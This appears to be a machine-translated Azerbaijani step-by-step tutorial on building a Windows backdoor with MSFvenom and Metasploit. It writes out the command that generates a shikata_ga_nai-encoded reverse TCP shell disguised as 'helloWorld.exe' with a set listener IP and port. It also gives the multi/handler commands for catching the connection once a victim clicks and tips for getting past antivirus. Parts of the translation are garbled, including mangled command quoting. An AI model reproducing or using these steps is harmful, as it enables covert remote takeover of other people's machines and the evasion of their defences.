Arxa qapı, təhlükəsizlik mexanizmlərindən yan keçmək üçün istifadə olunur, çox vaxt gizli və əksər hallarda aşkarlanmır. MSFvenom, msfpayload və msfencode birləşməsindən istifadə edərək, əks qabıq TCP istifadə edərək təcavüzkara geri bağlanan bir arxa qapı yaratmaq mümkündür. Arxa qapını inkişaf etdirmək üçün hər hansı bir antivirus proqramından yayınmaq üçün zərərli proqramınızın imzasını dəyişdirməlisiniz. Bu layihəni giriş icazəniz olan bir cüt kompüterdə tamamlayın və bu müddətdə kompüter təhlükəsizliyi və bu cür arxa qapının necə işlədiyini öyrənəcəksiniz.
Addımlar
Addım 1. Kali'yi işə salın və Terminal konsolunu yandırın
Addım 2. Arayüzü göstərmək və IP ünvanınızı yoxlamaq üçün ifconfig yazın
Addım 3. Kodlayıcıların siyahısını göstərmək üçün msfvenom -l encoders yazın
Enkoder olaraq x86/shikata_ga_nai istifadə edəcəksiniz
Addım 4. "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe yazın
- -a x86 -platforma pəncərələri istifadə ediləcək memarlığı təyin edir.
- -p windows/shell/reverse_tcp, yüklənəcək yükləri təyin edir.
- LHOST dinləyicinin IP ünvanını təyin edir.
- LPORT dinləyici portunu təyin edir.
- -b "\ x00" pis xarakterdən qaçmaq üçün təyin edir (null bayt).
- -e x86/shikata_ga_nai kodlayıcıların adını təyin edir.
- -f exe> helloWorld.exe format çıxışını təyin edir.
Addım 5. Metasploit aktivləşdirmək üçün msfconsole yazın
İndi arxa qapınızı yaratdınız. Zərərçəkən helloWorld.exe -ni tıkladıqda, quraşdırılmış qabıq yükü aktiv olacaq və sisteminizlə yenidən əlaqə quracaq. Bağlantı əldə etmək üçün Metasploit-də çox işləyicini açmalı və yükləri təyin etməlisiniz
Addım 6. Use exploit/multi/handler yazın
Addım 7. Yükləmə yükü windows/shell/reverse_tcp yazın
Addım 8. Modulu yoxlamaq üçün şou seçimlərini yazın
Addım 9. LHOST 192.168.48.129 yazın
"LHOST" dinləyicinin IP ünvanını təyin edir
Addım 10. Set LPORT 4444 yazın
"LPORT" dinləyici portunu təyin edir
Addım 11. Run yazın və qurbanın maşınından əlaqəni gözləyin
Addım 12. Qurbanın helloWorld.exe üzərinə basmasını gözləyin
Sonra qurbanın maşınına uğurla qoşulacaqsınız.
İpuçları
- MSFvenomda -i istifadə etmək kodlaşdırmanın təkrarlanmasını təmsil edəcək. Bəzən daha çox təkrarlamalar AV proqramından yayınmağa kömək edə bilər.
- MSFvenom istifadə edərək arxa qapını necə yaratmağı və kodlamağı öyrənmisiniz, amma bu üsul bu gün bəzi AV proqramlarına qarşı mükəmməl işləməyəcəkdir. Bunun səbəbi MSFvenomdakı icra şablonlarıdır. AV satıcıları bu şablonların statik imzasını əlavə etdilər və sadəcə onları axtardılar. Bu problemin həlli fərqli bir icra şablonu və ya fərqli vasitələrdən istifadə etməkdir.